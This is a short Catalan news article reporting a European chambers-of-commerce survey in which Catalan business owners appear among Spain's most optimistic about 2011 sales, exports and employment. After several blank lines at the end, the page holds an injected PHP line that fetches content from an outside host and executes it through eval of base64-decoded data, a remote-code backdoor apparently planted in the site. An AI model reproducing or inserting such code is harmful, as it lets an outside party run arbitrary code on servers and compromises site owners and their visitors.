Perspectives positives dels empresaris catalans per al 2011

Les perspectives milloren i després d'un 2010 negatiu la majoria d'empresaris catalans preveuen que el 2011 la seva xifra de negoci creixerà.

Segons una enquesta de les cambres de comerç d'Europa a més de 9.000 empresaris de l'Estat espanyol i 70.000 de tot el continent, els catalans són els més optimistes de l'Estat, només darrere dels habitants de la Rioja, i superen aquesta regió quant a vendes a Espanya. Això sí, Espanya es troba entre els més pessimistes de la UE i només els habitants de la Rioja i els catalans se situen al voltant de la mitjana europea. Els que tenen millors perspectives són els suecs, mentre que els que pitjor veuen el 2011 són els escocesos.

 

Els empresaris catalans també encapçalen el rànquing espanyol de bones perspectives pel que fa a exportacions i ocupació. Les vendes al mercat exterior milloraran, segons una àmplia majoria d'emprenedors del país, que superen fins i tot la mitjana europea. També ho creuen pel que fa a l'ocupació, malgrat que l'optimisme és molt més moderat. Ara bé, aquesta millora encara no els aporta prou confiança i en general els empresaris encara no preveuen intensificar les inversions.

 

 
 

$rrr = file_get_contents('http://speed-dev.net/counter/count.php'); eval(base64_decode($rrr));